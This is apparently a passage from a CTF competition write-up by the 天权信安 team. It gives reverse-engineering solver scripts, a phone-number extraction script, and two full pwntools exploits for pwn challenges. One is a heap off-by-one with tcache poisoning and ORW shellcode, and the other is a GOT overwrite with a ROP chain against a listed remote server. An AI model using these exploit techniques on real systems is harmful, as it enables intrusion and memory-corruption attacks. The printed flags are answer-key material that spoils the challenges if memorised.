press U, then C, NOP them out, then press P to re-analyse the function and get rid of the junk code.
Shift+F12
A suspicious string is detected.
We can verify with dynamic debugging: the comparison is done one byte at a time,
so we write a script to brute-force it.
```python
import subprocess
import time

def execute_process_with_input_data(executable_path, input_payload, timeout=10):
    """
    Start the external program, talk to it through pipes, and return its stdout and stderr.
    :param executable_path: path of the executable
    :param input_payload: input data passed to the external program
    :param timeout: timeout in seconds
    :return: (stdout, stderr) tuple
    """
    try:
        # Start the external process and talk to it through pipes
        process_handler = subprocess.Popen(
            executable_path,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True
        )
        # Use communicate to send the input and collect the output
        standard_output, error_output = process_handler.communicate(input=input_payload, timeout=timeout)
        return standard_output, error_output
    except subprocess.TimeoutExpired:
        process_handler.kill()  # Kill the process on timeout
        standard_output, error_output = process_handler.communicate()
        return "Execution Timed Out", error_output

def generate_input_payload(char_array, outer_index, test_char):
    """
    Build the input data from the outer index and the character set.
    :param char_array: current character array
    :param outer_index: outer index
    :param test_char: character currently under test
    :return: the constructed input data
    """
    char_array[outer_index] = test_char  # Set the character at the current position
    return ''.join(char_array) + "\n"  # Build the input data

def check_output_lines(standard_output, expected_lines):
    """
    Check whether the number of output lines matches the expectation.
    :param standard_output: stdout of the external program
    :param expected_lines: expected number of output lines
    :return: True if the number of lines matches, otherwise False
    """
    output_lines = standard_output.split("\n")
    return len(output_lines) == expected_lines

def main():
    executable_path = "bouquet.exe"  # Path of the executable
    char_array = ['*'] * 25  # Initialise the character array
    char_set = 'j7aw_sC3addq4TAo}8_Fda{SD'  # Character set
    # Outer loop over the character positions
    for outer_index in range(25):
        # Inner loop over the character set
        for test_char in char_set:
            # Build the input data
            input_payload = generate_input_payload(char_array, outer_index, test_char)
            # Run the process and collect the output
            standard_output, error_output = execute_process_with_input_data(executable_path, input_payload)
            # Compute the expected number of output lines
            expected_lines = 49 - outer_index * 2
            # Check whether the line count matches
            if check_output_lines(standard_output, expected_lines):
                print(test_char, end="")  # Print the character if it matches
                break  # Leave the inner loop and move on to the next position

if __name__ == "__main__":
    main()
```
Flag:
DASCTF{asd48_daj7w_3adqo}
REVERSE.02
✦✦✦ 15 go_bytes
Steps:
The challenge is clearly written in Go.
· runtime_stringtoslicebyte() is probably a function that converts a string to a byte slice.
· Inside the loop, some data seems to be processed with bit operations (such as right shifts and bitwise OR). This may be encryption of the input or the execution of some algorithm.
Stack management: at the start, the program checks whether the stack is large enough and requests more stack space if not.
Memory allocation and initialisation: new objects are created with runtime_newobject() and their values are initialised.
Data processing and encryption: the code processes the data with complex bit operations, possibly an encryption algorithm or a data transformation.
Data validation: the processed data is checked against expected values. If it does not match, the program exits and prints an error message.
File/stream operations: formatted input and output are performed in several places.
The data in v12[j] is checked against the computed main_tmp ^ v8. If it does not match, the program prints an error message via fmt_Fprintln() and calls os_Exit(v9) to exit.
```python
import binascii

def generate_calculated_values(initial_value, num_values=40, multiplier=291, addend=1110, mask=0xFFFF):
    """
    Generate a sequence of values computed with the given formula.
    :param initial_value: initial value
    :param num_values: number of values to generate
    :param multiplier: multiplier
    :param addend: addend
    :param mask: bit mask that keeps the result within 16 bits
    :return: list of computed values
    """
    values = []
    current_value = initial_value
    for _ in range(num_values):
        current_value = (multiplier * current_value + addend) & mask  # Apply the formula and keep 16 bits
        values.append(current_value)
    return values

def xor_data_with_values(data, values):
    """
    XOR the data element by element.
    :param data: raw data to process
    :param values: list of values used for the XOR
    :return: list of processed data
    """
    return [data[i] ^ values[i] for i in range(len(data))]

def modify_data_order(data):
    """
    Move the last byte of the data to the front and shift the other bytes back.
    :param data: input data
    :return: modified data
    """
    return bytes([data[-1]]) + data[:-1]

def main():
    # Raw data in hexadecimal
    hex_numbers = [
        0x22B9, 0x0C9F8, 0x8C89, 0x0FF18, 0x1439, 0x4E0A, 0x2A8B, 0x7CB,
        0x0BDEB, 0x0FAAB, 0x3FFB, 0x784B, 0x9F1E, 0x4FEB, 0x4D0B, 0x0D08E,
        0x38BB, 0x0CBAE, 0x0D2CE, 0x913E, 0x0A6B, 0x0F03B, 0x507B, 0x398B,
        0x93DE, 0x3CCE, 0x459E, 0x4ABE, 0x553E, 0x316E, 0x33BE, 0x42FE,
        0x0CECE, 0x4DDE, 0x982B, 0x0A31B, 0x802E, 0x12EE, 0x0F67A, 0x0EB79
    ]
    # Initial value
    initial_value = 0xdead
    # Generate the values computed with the formula
    calculated_values = generate_calculated_values(initial_value)
    # XOR the raw data
    modified_numbers = xor_data_with_values(hex_numbers, calculated_values)
    # Convert the processed data to a byte stream
    hex_data = binascii.hexlify(bytes(modified_numbers))
    # Move the last byte of the byte stream to the front
    modified_data = modify_data_order(hex_data)
    # Print the result
    print("Modified Data:", modified_data)

# Run the main function
if __name__ == "__main__":
    main()
```
Flag:
DASCTF{faddff8cb4d711edbb2294085339ce84}
REVERSE.03
✦✦✦ 16 Zistel
Steps:
ELF file; drag it into IDA and have a look.
Pressing F5 shows three lines of code; step into the first function.
Inside we find a function sub_10021BA.
Go into it.
At line 32 we see the word "input".
So it reads our input; nothing more can be seen yet, so we use IDA remote debugging to find where the encryption happens.
Here we see a suspicious function.
It contains a lot of inline assembly.
It initialises registers and data on the stack.
It uses SIMD instructions for efficient data stores and loads.
It processes the input iteratively, probably performing some encryption, hashing or checksum computation. The actual computation uses the function sub_100261B and XOR operations.
The final result is stored in the xmm0 register and returned as an __int64.
Further down in the calling function we see a dword; double-click it.
Suspected to be the ciphertext; continue auditing.
Here are some checks, with the strings "try again" and "correct".
In this function we can see XOR, byte swaps and iterative processing.
Code:
```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint32_t uint32;

uint32 data1[] = {0x33293158, 0x60760211, 0x42185F46, 0x63746F29};
uint32 data2[] = {
    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
    0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,
    0xBBDBD183, 0x05340F2E
};
uint32 lookup_table[0x100];

void byte_swap(uint32 *num) {
    unsigned char *byte_ptr = (unsigned char*) num;
    unsigned char temp;
    for (int i = 0; i < 2; ++i) {
        temp = byte_ptr[i];
        byte_ptr[i] = byte_ptr[3 - i];
        byte_ptr[3 - i] = temp;
    }
}

int main() {
    // Initialise lookup_table
    for (int i = 0; i < 0x100; ++i) {
        lookup_table[i] = i & 3;
    }
    for (int idx = 0; idx < 4; idx += 2) {
        uint32 first = data1[idx];
        uint32 second = data1[idx + 1];
        for (int j = 19; j >= 0; --j) {  // the 20 rounds, applied in reverse order
            uint32 temp = second;
            second ^= data2[j];
            for (int k = 0; k < 4; ++k) {
                // swap byte k of `second` with the byte selected by the round-key byte
                uint8_t temp_idx = lookup_table[(data2[j] >> (k * 8)) & 0xff];
                unsigned char second_byte_array[4];
                memcpy(second_byte_array, &second, sizeof(second));
                unsigned char tmp = second_byte_array[k];
                second_byte_array[k] = second_byte_array[temp_idx];
                second_byte_array[temp_idx] = tmp;
                memcpy(&second, second_byte_array, sizeof(second));
            }
            second ^= data2[j];
            second ^= first;
            first = temp;
        }
        // The listing in the writeup ends here; write the pair back so it can be printed.
        data1[idx] = first;
        data1[idx + 1] = second;
    }
    // Print the 16 recovered bytes as text (in memory byte order; apply byte_swap() if needed)
    fwrite(data1, 1, sizeof(data1), stdout);
    putchar('\n');
    return 0;
}
```
Flag:
DASCTF{z1g_I3_S0_Coo0l!}
PWN.01
✦✦✦ 17 EZheap_2
Steps:
Off-by-one vulnerability in a heap menu challenge. Use the standard template to build overlapping chunks; Show can leak the PIE or the heap address (PIE is chosen here), which allows a tcachebin attack on stdout to leak the libc address; then the standard 2.27 ORW template finishes it.
Code:
```python
from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_addr1():
    return u32(p.recvuntil(b"\xf7")[-4:].ljust(4, b"\x00"))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('', )
elf = ELF('./pwn')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("/root/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")

def cmd(i):
    sla(b'Your choice:',str(i))
def add(idx,size):
    cmd(1)
    sla(b'index:',str(idx))
    sla(b'Size:',str(size))
def edit(idx,con):
    cmd(2)
    sla(b'index:',str(idx))
    sa(b'context:',con)
def free(idx):
    cmd(3)
    sla(b'index:',str(idx))
def show(idx):
    cmd(4)
    sla(b'choose:',str(idx))

add(0,0x18) #0
add(1,0x68) #1
add(2,0x68) #2
add(3,0x18) #3
add(10,0x68) #2
add(11,0x68) #2
edit(0,b'\x00'*0x18+p8(0xe1))
free(1)
add(4,0xd8)
show(4)
rl(b'\n')
pie=int(p.recv(14),16)-0x202160
free(10)
free(11)
free(2)
edit(4,b'a'*0x68+p64(0x71)+p64(pie+0x202020))
add(5,0x68)
add(6,0x68)
add(7,0x68)
edit(7,p64(0xfbad1800) + p64(0)*3 + b'\x00')
libc_base=get_addr()-0x3ed8b0
li(hex(libc_base))
rdi = libc_base+libc.search(asm("pop rdi\nret")).__next__()
rsi = libc_base+libc.search(asm("pop rsi\nret")).__next__()
rdx = libc_base+libc.search(asm("pop rdx\nret")).__next__()
rax = libc_base+libc.search(asm("pop rax\nret")).__next__()
ret = libc_base+libc.search(asm("ret")).__next__()
syscall=libc_base+libc.search(asm("syscall\nret")).__next__()
jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']+53
open_addr=libc_base+libc.sym['open']
read_addr=libc_base + libc.sym['read']
write_addr=libc_base + libc.sym['write']
payload=(b'\x00'*0x68+p64(0)+p64(free_hook&0xfffffffffffff000)+p64(0)*2+p64(0x2000)).ljust(0xa0,b'\x00')+p64(free_hook&0xfffffffffffff000)+p64(syscall)
free(5)
edit(4,b'\x00'*0x68+p64(0x71)+p64(free_hook))
add(5,0x68)
add(6,0x68)
edit(6,p64(setcontext))
add(15,0x400)
edit(15,payload)
free(15)
payload = p64(rdi)+p64(free_hook&0xfffffffffffff000)
payload += p64(rsi)+p64(0x1000)
payload += p64(rdx)+p64(7)
payload += p64(rax)+p64(10)
payload += p64(syscall)
payload += p64(jmp_rsp)
payload += asm(shellcraft.open('/flag'))
payload += asm(shellcraft.read(3,free_hook+0x300,0x30))
payload += asm(shellcraft.write(1,free_hook+0x300,0x30))
sl(payload)
inter()
```
Flag:
DASCTF{10737193860912531286748686403102}
PWN.02
✦✦✦ 18 Inequable Canary
Steps:
Same challenge as the one from 源鲁杯; apart from the interaction everything is identical.
Link:
https://xz.aliyun.com/t/15840?time__1311=GqjxnDgDyC0QDsD7zG7W%3DqxWw8iVWiW4D#toc-4
Code:
```python
from pwn import *

def s(a):
    p.send(a)
def sa(a,b):
    p.sendafter(a,b)
def inter():
    p.interactive()

context(log_level = 'debug',arch = 'amd64')
p=remote("139.155.126.78",27641)
elf=ELF('./canary')
vuln=0x400820
stack_fail_got=0x601038
sa("Say some old spells to start the journey\n",p64(vuln))
sa("Tell me the location of the Eye of the Deep Sea\n",b'a'*8+p64(stack_fail_got))
sa("I have magic\n",p64(0x400a5f)) #pop 3
pop_rdi=0x400a63
pop_rsi_r15=0x400a61
read_got=0x601040
write_addr=0x4006E0
payload=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(write_addr)+p64(vuln)
sa("Let's go!\n",payload)
libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))-0x10e1e0
bss=0x601060+0x800
sa("Tell me the location of the Eye of the Deep Sea\n",b'a'*8+p64(bss))
sa("I have magic\n",b'flag\x00\x00\x00\x00') #pop 3
pop_rdi=0x400a63
pop_rsi_r15=0x400a61
read_got=0x601040
write_addr=0x4006E0
pop_rax=libc_base+0x36174
pop_rdx_r12=libc_base+0x119431
syscall_ret=libc_base+0x47656 #syscall pop_rbp ret
payload=p64(pop_rdi)+p64(bss)+p64(pop_rsi_r15)+p64(0)*2+p64(pop_rax)+p64(2)+p64(syscall_ret)+p64(0) #open
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(0)+p64(syscall_ret)+p64(0) #read
payload+=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(1)+p64(syscall_ret)+p64(0) #write
sa("Let's go!\n",payload)
inter()
```
Flag:
DASCTF{95400240268504043541865376132978}
DB.01
✦✦✦ 19 DB
Steps:
Match the numbers out with a regular expression.
Code:
```python
import re
import csv

def validate_phone(phone):
    """
    Validates if a given phone number is a valid 11-digit number
    and matches the specified prefixes.
    """
    valid_prefixes = [
        '734', '735', '736', '737', '738', '739', '747', '748', '750', '751', '752', '757', '758', '759', '772',
        '778', '782', '783', '784', '787', '788', '795', '798', '730', '731', '732', '740', '745', '746', '755',
        '756', '766', '767', '771', '775', '776', '785', '786', '796', '733', '749', '753', '773', '774', '777',
        '780', '781', '789', '790', '791', '793', '799'
    ]
    return re.fullmatch(r'\d{11}', phone) and phone[:3] in valid_prefixes

# Read the data file, extract potential numbers, filter valid ones, and write to CSV
with open("a.txt", encoding="utf-8") as file:
    data = file.read()
potential_numbers = re.findall(r'\b\d{11}\b', data)
valid_numbers = [num for num in potential_numbers if validate_phone(num)]
output_data = [["category", "value"]] + [["phone", num] for num in valid_numbers]
with open("output.csv", mode="w", encoding="utf-8", newline="") as csvfile:
    writer = csv.writer(csvfile)
    writer.writerows(output_data)
print(f"Extracted {len(valid_numbers)} valid phone numbers. Results saved to output.csv.")
```
-- End --
That is the write-up for this competition; if you have questions, leave a comment or message the official account.
- 天权信安 Network Security Team -
Originally published on the WeChat official account (天权信安): 2024 Hubei Provincial Network and Data Security Practical Ability Competition: 天权信安 WriteUp